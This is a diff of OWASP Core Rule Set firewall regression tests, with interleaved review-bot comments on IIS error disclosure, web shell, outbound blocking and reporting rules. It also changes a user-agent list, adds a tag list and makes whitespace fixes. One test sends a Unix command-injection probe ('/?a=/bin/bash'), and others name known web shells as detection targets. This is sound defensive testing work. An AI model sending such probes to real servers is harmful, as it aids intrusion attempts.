+ description: "Tests for rule 954120 - IIS Error information disclusure"
+tests:
+ - test_title: 954120-1
+ desc: 'Match IIS error page'
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ method: "POST"
+ version: "HTTP/1.1"
+ uri: "/anything"
+ data: |
+ text=404.14 - URL too long.
+ output:
+ log_contains: id "954120"
+ - test_title: 954120-2
+ desc: 'Match IIS error page'
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ method: "POST"
+ version: "HTTP/1.1"
+ uri: "/anything"
+ data: |
+ text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed.
+ output:
+ log_contains: id "954120"
diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml
new file mode 100644
index 0000000000..bd60930d49
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml
@@ -0,0 +1,70 @@
+---
+meta:
+ author: "azurit"
+ enabled: true
+ name: "955100.yaml"
+ description: "Regression tests for rule 955100"
+tests:
+ - test_title: 955100-1
+ desc: "Matching web shell NCC Shell"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: |
+
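Review bot: The `description` in the `meta` block misspells `disclusure` (should be `disclosure`), and both test cases carry the identical `desc: 'Match IIS error page'`, so a failing run cannot tell 954120-1 from 954120-2 without opening the file. Suggest `desc: 'Match IIS error page (404.14 - URL too long)'` for the first and `desc: 'Match IIS error page (500.15 - direct request for GLOBAL.ASA)'` for the second. Both cases POST the error text to `/anything`, which — per the 954100 description in this same commit — reflects the request into the response; a one-line comment above `data:` saying the body is echoed back so the response-phase rule sees it would save readers from expecting a real IIS error page to be served.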

.:NCC:. Shell v + output: + log_contains: "id \"955100\"" + - test_title: 955100-2 + desc: "Matching web shell Simple PHP backdoor" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: | + + output: + log_contains: "id \"955100\"" + - test_title: 955100-3 + desc: "Matching web shell WinX Shell" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: | + -:[GreenwooD]:- WinX Shell + output: + log_contains: "id \"955100\"" diff --git a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml new file mode 100644 index 0000000000..38d62b5fcc --- /dev/null +++ b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml 
@@ -0,0 +1,71 @@
+---
+meta:
+ author: "studersi"
+ enabled: true
+ name: "959100.yaml"
+ description: |
+ Test whether the outbound blocking mechanism works by testing whether rule 959100 is triggered.
+ For these tests, existing test are repurposed with different assertions. Instead of asserting that the original
+ rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking
+ rule to be triggered.
+tests:
+ - test_title: 959100-1
+ desc: Test is basically identical to 953120-0 (PHP leakage positive test in phase 4) but here we assert that the outbound blocking mechanism is triggered
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data:
+ output:
+ log_contains: "id \"959100\""
+ - test_title: 959100-2
+ desc: Test is basically identical to 953120-1 (PHP leakage negative test in phase 4) but here we assert that the outbound blocking mechanism is not triggered
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data:
+ output:
+ log_contains: "Outbound Anomaly Score Exceeded [(]Total Score: "
diff --git a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml
new file mode 100644
index 0000000000..563d6cfce9
--- /dev/null
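Review bot: The assertion for 959100-2 contradicts its own description: the `desc` says the outbound blocking mechanism is *not* triggered, yet `output` uses `log_contains: "Outbound Anomaly Score Exceeded [(]Total Score: "`, which only passes when the blocking message is logged, so the negative case would silently become a second positive case. If the negative intent is right, the line should read `no_log_contains: "Outbound Anomaly Score Exceeded [(]Total Score: "` (the form 980170-3 in this same commit uses); otherwise the description needs rewording. The cross-references `953120-0` and `953120-1` in the two `desc` fields also look off by one against the titles `953120-1` (positive) and `953120-2` (negative) in the 953120.yaml added by this commit — worth confirming. Both `data:` lines appear empty in this view, which may be an artefact of how the page was captured; if the payload really is missing, neither case can exercise the phase-4 PHP leakage rule the blocking test depends on.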
+++ b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml 
@@ -0,0 +1,66 @@ +--- +meta: + author: "studersi" + enabled: true + name: "980170.yaml" + description: | + Test whether level 4 inbound reporting in phase 5 works by testing whether rule 980170 is triggered. + For these tests, existing test are repurposed with different assertions. Instead of asserting that the original + rules are triggered that the tests are written for, we assert that triggering these rules causes the corresponding + reporting rules to be triggered. +tests: + - test_title: 980170-1 + desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that was blocked + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + # Will match rules + # - 920273: restricted characters violation + # - 920350: numeric IP in Host header + # - 932160: Unix remote command execution + # - 932236: Unix command injection + # - 932260: Unix remote command execution + uri: "/?a=/bin/bash" + output: + log_contains: "id \"980170\"" + - test_title: 980170-2 + desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that scored but was not blocked + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + # Will match rule 920350: numeric IP in Host header + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + uri: "/" + output: + log_contains: "id \"980170\"" + - test_title: 980170-3 + desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is not logged that did not score + stages: + - stage: + input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP 
CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + uri: "/" + output: + no_log_contains: "id \"980170\"" diff --git a/tests/regression/utils/data/popularUAs.data b/tests/regression/utils/data/popularUAs.data index 4675a26b29..bb6f417cb1 100644 --- a/tests/regression/utils/data/popularUAs.data +++ b/tests/regression/utils/data/popularUAs.data @@ -50,7 +50,7 @@ MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8 MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23 Mediapartners-Google Microsoft URL Control - 6.00.8862 -Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) +Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1 Mozilla/2.0 (compatible; Ask Jeeves/Teoma) Mozilla/2.02E (Win95; U) @@ -72,10 +72,10 @@ Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) -Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 -Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 -Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) XV6800 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) XV6800 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 8.12; MSIEMobile6.0) Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 
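Review bot: 980170-3 changes two inputs at once relative to 980170-1 and 980170-2: `Host` becomes `"localhost"` (the property 920350 actually inspects, as the inline comment on 980170-2 says) but `dest_addr` is also switched from `"127.0.0.1"` to `"localhost"`. Keeping `dest_addr: "127.0.0.1"` would make the Host header the only difference between the three cases; as written, if `localhost` resolves to `::1` first on the test host, the request may reach a different listener than the other two, which would be hard to diagnose from a `no_log_contains` failure. The `description` block also states what is asserted but not the precondition that the test environment must run with inbound reporting level 4 for 980170 to fire at all; a sentence such as `Requires the test configuration to set the reporting level to 4.` would make that explicit. This hunk's closing lines are the end of the file, but the hunk starts on the previous line of this page.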
@@ -162,7 +162,7 @@ Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535. Mozilla/5.0 (Linux; U; Android 4.1; en-us; sdk Build/MR1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.1 Safari/534.30 Mozilla/5.0 (Linux; U; Android 4.2; en-us; sdk Build/MR1) AppleWebKit/535.19 (KHTML, like Gecko) Version/4.2 Safari/535.19 Mozilla/5.0 (Linux; U; Android 4.3; en-us; sdk Build/MR1) AppleWebKit/536.23 (KHTML, like Gecko) Version/4.3 Mobile Safari/536.23 -Mozilla/5.0 (Linux; webOS/2.2.4; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) webOSBrowser/221.56 Safari/534.6 Pre/3.0 +Mozilla/5.0 (Linux; webOS/2.2.4; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) webOSBrowser/221.56 Safari/534.6 Pre/3.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Camino/2.2.1 
@@ -196,10 +196,11 @@ Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us; Silk/1.0.13.81_10003810 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4736.0 Safari/537.36 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8 Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941 -Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 +Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8 
@@ -212,8 +213,8 @@ Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/ Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 -Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Arora/0.11.0 Safari/533.3 -Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) QupZilla/1.3.1 Safari/533.3 +Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Arora/0.11.0 Safari/533.3 +Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) QupZilla/1.3.1 Safari/533.3 Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20100101 Firefox/10.0.12 Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20130108 Firefox/10.0.12 SeaMonkey/2.7.2 Mozilla/5.0 (PLAYSTATION 3; 1.10) @@ -278,6 +279,7 @@ Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0) Gecko/16.0 Firefox/16.0 Mozilla/5.0 (Windows NT 6.2; rv:19.0) Gecko/20121129 Firefox/19.0 Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36 OPR/18.0.1284.49 Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0 
@@ -319,7 +321,7 @@ Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.22 (KHTML like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22 Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36 Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 -Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 +Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20120502 Firefox/12.0 SeaMonkey/2.9.1 Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Iceweasel/14.0.1 Mozilla/5.0 (X11; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0 @@ -376,7 +378,7 @@ Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6 Mozilla/5.0 (X11; U; Linux i686; rv:19.0) Gecko/20100101 Slackware/13 Firefox/19.0 Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5) Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT -Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT +Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9 Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15 Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 
@@ -405,7 +407,7 @@ Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:20.0) Gecko/20100101 Firefox/20.0 -Mozilla/5.0 (compatible; Exabot/3.0; http://www.exabot.com/go/robot) +Mozilla/5.0 (compatible; Exabot/3.0; http://www.exabot.com/go/robot) Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html) Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11; Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.30-7.dmz.1-liquorix-686; X11) KHTML/3.5.10 (like Gecko) (Debian package 4:3.5.10.dfsg.1-1 b1) @@ -423,8 +425,8 @@ Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko) Mozilla/5.0 (compatible; Konqueror/4.5; NetBSD 5.0.2; X11; amd64; en_US) KHTML/4.5.4 (like Gecko) Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko) Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) -Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) -Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0 
@@ -473,7 +475,7 @@ Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gec Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20 Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20 Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145 -Mozilla/5.0 (iPod; U; CPU iPhone OS 6_1 like Mac OS X; en-HK) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IP Mobile +Mozilla/5.0 (iPod; U; CPU iPhone OS 6_1 like Mac OS X; en-HK) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IP Mobile Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0 Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0 Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 @@ -580,7 +582,7 @@ msnbot/0.11 ( http://search.msn.com/msnbot.htm) msnbot/1.0 ( http://search.msn.com/msnbot.htm) msnbot/1.1 ( http://search.msn.com/msnbot.htm) nook browser/1.0 -portalmmm/2.0 N410i(c20;TB) +portalmmm/2.0 N410i(c20;TB) w3m/0.5.1 w3m/0.5.1 wii libnup/1.0 diff --git a/tests/regression/utils/testSampling.py b/tests/regression/utils/testSampling.py index e7e1223a4f..5d3b7e9bcb 100644 --- a/tests/regression/utils/testSampling.py +++ b/tests/regression/utils/testSampling.py 
@@ -2,9 +2,9 @@ """ This script assumes that default blocking action is 403 -and sampling is one. It will send a know bad request +and sampling is one. It will send a know bad request that is expected to be blocked. If sampling is on it -will only block a certain percentage. We send 1000 +will only block a certain percentage. We send 1000 requests to verify this. In order to do this we must also turn off IP Reputation blocking. SecAction "id:900005,phase:1,nolog,pass,ctl:ruleEngine=on,ctl:ruleRemoveById=910000" @@ -30,7 +30,7 @@ def run_requests(iterations): status_not_403 = 0 status_403 = 0 for status in returns.values(): - if status == 403: + if status == 403: status_403 += 1 else: status_not_403 += 1 @@ -39,7 +39,7 @@ def run_requests(iterations): print "403s =", x print "not 403s =", y return (x,y) - + def test_sampling(): print "running" block,passed = run_requests(100) diff --git a/tests/regression/utils/testUserAgents.py b/tests/regression/utils/testUserAgents.py index 78af92d54c..9d25266fd2 100644 --- a/tests/regression/utils/testUserAgents.py +++ b/tests/regression/utils/testUserAgents.py @@ -21,17 +21,17 @@ def run_requests(useragent_list): http_ua = http.HttpUA() http_ua.send_request(input_data) status = http_ua.response_object.status - if status == 403: + if status == 403: status_403 += 1 else: - status_not_403 += 1 + status_not_403 += 1 x = (status_403/(len(useragent_list)*1.0))*100 y = (status_not_403/(len(useragent_list)*1.0))*100 print "403s =", x print "not 403s =", y - + def main(): uas = read_useragents('./data/popularUAs.data') run_requests(uas) -main() +main() diff --git a/util/APPROVED_TAGS b/util/APPROVED_TAGS new file mode 100644 index 0000000000..5c48d8ecc4 --- /dev/null +++ b/util/APPROVED_TAGS 
@@ -0,0 +1,97 @@
+OWASP_CRS
+PCI/12.1
+PCI/6.5.1
+PCI/6.5.10
+PCI/6.5.2
+PCI/6.5.4
+PCI/6.5.6
+anomaly-evaluation
+application-multi
+attack-deprecated-header
+attack-disclosure
+attack-fixation
+attack-generic
+attack-injection-generic
+attack-injection-java
+attack-injection-php
+attack-lfi
+attack-multipart-header
+attack-protocol
+attack-rce
+attack-reputation-scanner
+attack-rfi
+attack-sqli
+attack-ssrf
+attack-xss
+capec/1/180/77
+capec/1000/118/116
+capec/1000/118/116/54
+capec/1000/118/116/54/127
+capec/1000/118/224/541/310
+capec/1000/152
+capec/1000/152/137/15/460
+capec/1000/152/137/6
+capec/1000/152/175/253
+capec/1000/152/242
+capec/1000/152/242/63
+capec/1000/152/248
+capec/1000/152/248/136
+capec/1000/152/248/66
+capec/1000/152/248/88
+capec/1000/153/267
+capec/1000/210/272
+capec/1000/210/272/220
+capec/1000/210/272/220/273
+capec/1000/210/272/220/274
+capec/1000/210/272/220/33
+capec/1000/210/272/220/34
+capec/1000/225/122/17/650
+capec/1000/225/21/593/61
+capec/1000/225/664
+capec/1000/255/153
+capec/1000/255/153/126
+capec/1000/255/153/267
+capec/1000/255/153/267/120
+capec/1000/255/153/267/72
+capec/137/134
+capec/272/220
+header-allowlist
+language-aspnet
+language-java
+language-javascript
+language-ldap
+language-multi
+language-perl
+language-php
+language-powershell
+language-ruby
+language-shell
+paranoia-level/1
+paranoia-level/2
+paranoia-level/3
+paranoia-level/4
+platform-apache
+platform-db2
+platform-emc
+platform-firebird
+platform-frontbase
+platform-hsqldb
+platform-iis
+platform-informix
+platform-ingres
+platform-interbase
+platform-internet-explorer
+platform-maxdb
+platform-msaccess
+platform-mssql
+platform-multi
+platform-mysql
+platform-oracle
+platform-pgsql
+platform-sqlite
+platform-sybase
+platform-tomcat
+platform-unix
+platform-windows
+reporting
+xss-perf-disable
diff --git a/util/av-scanning/runAV/common.c b/util/av-scanning/runAV/common.c
index e7ba760696..08d2128903 100755
--- a/util/av-scanning/runAV/common.c
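Review bot: The list is ordered byte-wise rather than alphabetically — `OWASP_CRS` and the `PCI/…` entries sit before `anomaly-evaluation`, and `capec/1/180/77` precedes `capec/1000/…` — which is what `LC_ALL=C sort` produces, but nothing on the page records that convention, so the next contributor adding a tag with a locale-aware sort will reorder the whole file. Since a comment line in this file might be read as a tag by whatever consumes it (not visible here), the ordering rule is better stated next to that consumer, e.g. `# util/APPROVED_TAGS is kept in byte order (LC_ALL=C sort); add new tags accordingly.` Duplicated entries would also go unnoticed in review without a uniqueness check, which `sort -c -u` (or the equivalent in the consuming script) could enforce.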
+++ b/util/av-scanning/runAV/common.c @@ -24,7 +24,7 @@ int unlock_file(int fd) } int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask) -{ +{ char time_str[64], line[1024*1024]; time_t t; int fd; @@ -61,7 +61,7 @@ int print_request(char* url,char *command,parameter_t *parameters, int num_of_pa else sprintf(line,"\n"); write(fd,line,strlen(line)); } - + } sprintf(line,"%s:REQUEST-END:========================================\n",time_str); write(fd,line,strlen(line)); @@ -165,7 +165,7 @@ int is_proxy_up() if (fscanf(fp,"%d",&pid) == 0) { print_error("is_proxy_up","fscanf","missing PID",0); fclose(fp); - return 0; + return 0; } fclose(fp); @@ -177,7 +177,7 @@ int is_proxy_up() int run_cmd(char *command, char *output, int output_size) { - char line[1024]; + char line[1024]; FILE *fp; if (output_size > 0 && output) output[0]='\0'; @@ -228,7 +228,7 @@ int parse_file(char *filename, parameter_t *parameters, int max_parameters) while ( i < max_parameters && fgets(line,1024,fp)) { if (ptr = strstr(line,"#")) *ptr='\0'; - if (sscanf(line,"%[^=]=%s",parameters[i].name,parameters[i].value) != 2) + if (sscanf(line,"%[^=]=%s",parameters[i].name,parameters[i].value) != 2) continue; i++; } @@ -365,7 +365,7 @@ int parse_query_and_body (parameter_t *parameters, int max_parameters) } query[body_len] = '\0'; num_of_params = parse_query(query,parameters,max_parameters); - free(query); + free(query); return num_of_params; } } @@ -380,10 +380,10 @@ int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, cha if (sscanf(args[i],"%[^=]=%s",name,value) < 2) continue; if (strlen(name) < 